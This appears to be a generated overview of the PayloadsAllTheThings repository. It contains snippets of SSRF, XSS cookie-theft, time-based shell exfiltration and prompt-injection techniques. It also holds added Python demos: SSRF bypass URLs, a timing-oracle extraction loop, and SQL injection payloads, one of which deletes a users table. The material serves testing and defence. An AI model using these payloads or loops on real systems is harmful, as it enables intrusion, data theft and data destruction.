swisskyrepo/PayloadsAllTheThings
PayloadsAllTheThings
This project is a comprehensive, community-sourced knowledge base designed for security professionals and researchers. It functions as a centralized repository of offensive security techniques, providing a structured collection of exploit payloads, attack vectors, and methodologies for conducting vulnerability assessments and penetration testing.
The repository organizes payloads by vulnerability type and target environment, so a technique can be found quickly during an assessment. Contributions are tracked in Git and new chapters are created from a template, which keeps the content current and consistent across a wide range of technical domains.
The project covers a broad capability surface, including detailed references for web application security, SQL injection, insecure deserialization, and prompt injection against LLM-based applications. It also aggregates external resources, such as research papers and third-party tools, to provide a wider view of current offensive techniques and the corresponding defenses.
The documentation is organized as a hierarchical tree of markdown files, designed for easy navigation and reference during active security engagements.
Features
- Web Application Penetration Testing - Identifying and validating security flaws in web services by systematically applying known attack vectors and injection patterns.
- Remote File Inclusion Payloads - > Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input. Remote File Inclusion does
- Community-Sourced Knowledge Bases - Aggregates security research and attack vectors from a global contributor base to maintain an up-to-date repository of techniques.
- Offensive Security Cheatsheets - A structured repository of actionable payloads and command-line sequences designed to assist security professionals in testing application resilience.
- Vulnerability Research - A comprehensive collection of vulnerability exploitation techniques, attack vectors, and security research methodologies for penetration testing and security assessments.
- Local File Inclusion Payloads - **File Inclusion Vulnerability** should be differentiated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target
- Exploit Taxonomies - Categorizes diverse exploitation methods by vulnerability type and target environment to facilitate rapid lookup during security assessments.
- Prepared Statements - PDO, or PHP Data Objects, is an extension for PHP that provides a consistent and secure way to access and interact with databases. It is designed to offer a standardized approach to database interaction, allowing develop
- SQL Injection Scanners - [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool; [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that auto
- AI Prompt Injection Vulnerabilities - Indirect Prompt Injection is a type of security vulnerability that occurs in systems using AI, particularly Large Language Models (LLMs), where user-provided input is processed without proper sanitization. This type of a
- Deserialization Vulnerability Resources - Check the following sub-sections, located in other chapters: - [Java deserialization : ysoserial, ...](Java/) - [PHP (Object injection) : phpggc, ...](PHP/) - [Ruby : universal rce gadget, ...](Ruby/) - [Python : pickle
- Prompt Injection Payloads - Direct Prompt Injection is a security vulnerability in AI-powered applications where a malicious user manipulates the prompt to make the AI ignore its original instructions and execute unintended commands. Here are a lis
- Security Methodologies - A centralized knowledge hub offering standardized approaches and tactical guidance for evaluating the security posture of modern web and cloud environments.
- Vulnerability Discovery References - Providing a centralized repository of methodologies, tools, and technical references for conducting thorough security audits and vulnerability discovery.
- Command Execution Cheat Sheets - Content of this page has been moved to [InternalAllTheThings/active-directory](https://github.com/swisskyrepo/InternalAllTheThings/) - [Active Directory - Certificate Services](https://swisskyrepo.github.io/InternalAllTh
- Account Takeover Techniques - ### Account Takeover via Cross Site Scripting 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain: `*.domain.com` 2. Leak the current **session cookie** 3. Authenticate a
- Cross-Site Scripting Techniques - ### XSS Hunter > XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the pag
- System Prompt Injection Payloads - The system prompt and user prompt are key concepts in conversational AI that define how the interaction between the AI and the user is shaped. - The system prompt is the set of instructions and contextual information tha
- URL Scheme Exploits - ### File Allows an attacker to fetch the content of a file on the server, transforming the SSRF into a file read: `file:///etc/passwd`, `file://\/\/etc/passwd` ### HTTP Allows an
- Authentication Bypass Techniques - In a standard authentication mechanism, users provide a username and password. The application typically checks these credentials against a database. For example, a SQL query might look something like this:
- Blind SSRF Exploitation - > When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read. Use an SSRF chain to gain an Out-of-Band output: [assetnote/blind-ssrf-chains](https://github.co
- Data Exfiltration Payloads - ### Time Based Data Exfiltration Extracting data one character at a time and detecting the correct value from the delay. - Correct value: wait 5 seconds `swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s
- Deserialization Gadgets - > A POP (Property Oriented Programming) gadget is a piece of code implemented by an application's class, that can be called during the deserialization process. POP gadgets characteristics: - Can be serialized - Has publi
- Filter Bypass Techniques - ### Default Targets By default, Server-Side Request Forgery is used to access services hosted on `localhost` or hidden further on the network. - Using `localhost`: `http://localhost:80`
- SQL Injection Techniques - > Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives output. - Zenodermus Javanicus In short, the result of t
- JSON Web Tokens - > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted bec
- Security Vulnerability Summaries - [Methodology](#methodology), [Proof of Concept](#proof-of-concept), [Data Grabber](#data-grabber), [CORS](#cors), [UI Redressing](#ui-redressing), [Javascript Keylogger](#javascript-keylogger), [Other Ways](#othe
- SQL Injection Detection Tools - Detecting the entry point in SQL injection (SQLi) involves identifying locations in an application where user input is not properly sanitized before it is included in SQL queries. - **Error Messages**: Inputting special
- SQL Injection Payloads - Second Order SQL Injection is a subtype of SQL injection where the malicious SQL payload is primarily stored in the application's database and later executed by a different functionality of the same application. Unlike f
- Stacked SQL Injections - Stacked Queries SQL Injection is a technique where multiple SQL statements are executed in a single query, separated by a delimiter such as a semicolon (`;`). This allows an attacker to execute additional malicious SQL c
- Vulnerability Exploitation References - A curated index of common security flaws, providing technical explanations and practical examples for identifying and verifying potential system weaknesses.
- Version-Controlled Knowledge Bases - Utilizes distributed source control to track changes, manage contributions, and maintain the historical integrity of the security research data.
- Security Resource Aggregators - Curates and maintains a centralized index of third-party security tools, research papers, and external documentation for comprehensive threat analysis.
- Scaffolding Tools - Standardizes the creation of new vulnerability chapters by enforcing a consistent file structure and metadata format across the repository.
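The URL Scheme Exploits and Filter Bypass Techniques items above describe the same gap from two sides: a `file://` URL turns an SSRF into a file read, and `localhost` is only one of many spellings of the loopback address. The following Python is an added example, not code from PayloadsAllTheThings: a string deny-list of the kind those payloads are built to evade, beside a scheme-and-address check that rejects them. The URL list is constructed for this example; the decimal, hex and octal spellings of 127.0.0.1 are the usual alternative encodings and are assumptions about what a target's filter would receive.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample inputs: loopback spellings, a cloud metadata address,
# a credential-prefixed URL and two file:// reads, then two ordinary targets.
HOSTILE_URLS = [
    "http://localhost:80",
    "http://127.0.0.1:80",
    "http://0.0.0.0:80",
    "http://[::]:80",
    "http://[::1]:80",
    "http://2130706433/",       # 127.0.0.1 as a decimal integer (assumed bypass form)
    "http://0x7f000001/",       # the same address in hex
    "http://017700000001/",     # the same address in octal
    "http://169.254.169.254/latest/meta-data/",
    "http://example.com@127.0.0.1/",
    "file:///etc/passwd",
    "file://\\/\\/etc/passwd",
]
BENIGN_URLS = ["https://example.com/", "https://api.example.com:8443/v1"]


def naive_filter(url):
    """Deny-list check of the kind the payloads evade: allow unless a known
    bad substring appears. Returns True when the URL would be fetched."""
    return not any(bad in url.lower() for bad in ("localhost", "127.0.0.1"))


def _literal_ip(host):
    """ip_address for a host given as a dotted/IPv6 literal or as a bare
    decimal, hex or octal integer; None when it looks like a DNS name."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        if host.lower().startswith("0x"):
            return ipaddress.ip_address(int(host, 16))
        if len(host) > 1 and host.startswith("0") and host.isdigit():
            return ipaddress.ip_address(int(host, 8))
        return ipaddress.ip_address(int(host, 10))
    except ValueError:
        return None


def hardened_filter(url):
    """Allow only http(s) to a host that is neither 'localhost' nor a
    non-global address literal. A DNS name passes this check and must still
    be resolved and re-checked (and the resolved address pinned) before the
    request is sent; that resolution step is out of scope here."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname          # lower-cased, brackets stripped, userinfo dropped
    if not host or host == "localhost" or host.endswith(".localhost"):
        return False
    ip = _literal_ip(host)
    if ip is None:
        return True
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped        # ::ffff:127.0.0.1 is still loopback
    return ip.is_global


def bypasses(filter_fn):
    """Hostile URLs that the given filter would let through."""
    return [u for u in HOSTILE_URLS if filter_fn(u)]


if __name__ == "__main__":
    print("naive filter lets through:", bypasses(naive_filter))
    print("hardened filter lets through:", bypasses(hardened_filter))
```

`is_global` is used rather than a hand-written list of ranges because it already covers loopback, unspecified, link-local (including 169.254.169.254), RFC 1918, shared address space and the documentation ranges; the price is that those documentation ranges are also blocked, which is acceptable for an egress check.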
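The Data Exfiltration Payloads item shows the shell side of time-based extraction: compare one character of the secret and sleep only on a match. The Python below is an added example, not code from the repository: it is the attacker-side loop that drives such an oracle. `injected_check` and the value `SECRET` are constructed stand-ins for the target; in a real engagement `injected_check` would be replaced by the HTTP request that delivers the payload, and the 0.15 s delay by the `sleep 5` the page uses.

```python
import string
import time

# Constructed: the value the injected command would read on the target
# (stands in for the output of `whoami`).
SECRET = "s3cr"


def injected_check(position, guess):
    """Stand-in for the injected fragment
    `if [ $(whoami|cut -c N) == X ]; then sleep 5; fi` (cut is 1-indexed,
    so N is position + 1). Nothing is returned; the delay is the only signal.
    A short delay keeps the demo quick."""
    if position < len(SECRET) and SECRET[position] == guess:
        time.sleep(0.15)


def is_slow(position, guess, threshold=0.075):
    """True when the probe took at least `threshold` seconds."""
    start = time.monotonic()
    injected_check(position, guess)
    return time.monotonic() - start >= threshold


def extract(charset=string.ascii_lowercase + string.digits, max_len=32, confirm=2):
    """Recover the value one character at a time. A candidate counts only if
    the delay shows up on `confirm` consecutive probes, so a single slow
    round trip on the network does not yield a wrong character. The string
    ends at the first position where no candidate produces a delay."""
    recovered = []
    for pos in range(max_len):
        for c in charset:
            if all(is_slow(pos, c) for _ in range(confirm)):
                recovered.append(c)
                break
        else:
            break  # no candidate matched: reached the end of the value
    return "".join(recovered)


if __name__ == "__main__":
    print(extract())
```

Cost grows with the charset size times the length of the value; on a real target the threshold has to sit well above the normal response time, and a binary search on the character's byte value (`[ $(whoami|cut -c 1|od -An -tu1) -gt 109 ]`) cuts the probe count from one per candidate to about seven per character.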
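The Prepared Statements, SQL Injection Payloads (second-order) and Stacked SQL Injections items describe three behaviours that are easiest to see side by side. The following Python/sqlite3 script is an added example, not code from PayloadsAllTheThings or from PDO: the schema, the user rows and the `audit` table are constructed; `executescript` stands in for a driver entry point that runs several statements in one call, and `execute` for one that refuses more than one.

```python
import sqlite3


def fresh_db():
    """Constructed in-memory schema standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT, role TEXT);
        INSERT INTO users VALUES ('admin', 'S3cret!', 'admin');
        CREATE TABLE audit (id INTEGER PRIMARY KEY, note TEXT);
    """)
    return conn


def register(conn, name, password):
    # First order: parameterized, so the hostile name is stored inertly.
    conn.execute("INSERT INTO users VALUES (?, ?, 'user')", (name, password))


def change_password_vulnerable(conn, name, new_password):
    # Second order: a later feature trusts the stored value and concatenates it.
    conn.execute(f"UPDATE users SET password = '{new_password}' WHERE name = '{name}'")


def change_password_fixed(conn, name, new_password):
    # Stored data is still untrusted: bind it like any other input.
    conn.execute("UPDATE users SET password = ? WHERE name = ?", (new_password, name))


def log_search_vulnerable(conn, term):
    # Stacked queries: executescript runs every statement in the string.
    conn.executescript(f"INSERT INTO audit (note) VALUES ('search: {term}')")


def log_search_single(conn, term):
    # Same concatenation, but execute() raises before running anything
    # if the string holds more than one statement.
    try:
        conn.execute(f"INSERT INTO audit (note) VALUES ('search: {term}')")
        return True
    except sqlite3.Error:
        return False


def log_search_fixed(conn, term):
    conn.execute("INSERT INTO audit (note) VALUES (?)", (f"search: {term}",))


def admin_password(conn):
    return conn.execute("SELECT password FROM users WHERE name = 'admin'").fetchone()[0]


def user_count(conn):
    return conn.execute("SELECT count(*) FROM users").fetchone()[0]


def demo_second_order(fixed):
    """Register a hostile name, then let the password-change feature read it
    back from the database and use it. Returns the admin password afterwards."""
    conn = fresh_db()
    hostile = "x' OR name='admin"
    register(conn, hostile, "pw")
    # The application later reads the stored name (e.g. from the session user).
    stored = conn.execute("SELECT name FROM users WHERE name = ?", (hostile,)).fetchone()[0]
    (change_password_fixed if fixed else change_password_vulnerable)(conn, stored, "pwned")
    return admin_password(conn)


def demo_stacked(sink):
    """Feed a payload that closes the INSERT, appends a DELETE and reopens an
    INSERT so the trailing quote and bracket still parse. Returns the number
    of users left."""
    conn = fresh_db()
    payload = "x'); DELETE FROM users; INSERT INTO audit (note) VALUES ('"
    sink(conn, payload)
    return user_count(conn)


if __name__ == "__main__":
    print("second order, vulnerable:", demo_second_order(fixed=False))
    print("second order, fixed:", demo_second_order(fixed=True))
    for s in (log_search_vulnerable, log_search_single, log_search_fixed):
        print(s.__name__, "users left:", demo_stacked(s))
```

The payload for the stacked case deliberately avoids a trailing comment and instead rebalances the statement, which is what a tester does when the sink rejects a comment-terminated string; whether stacking works at all depends on the entry point (here `executescript` versus `execute`), not on the database.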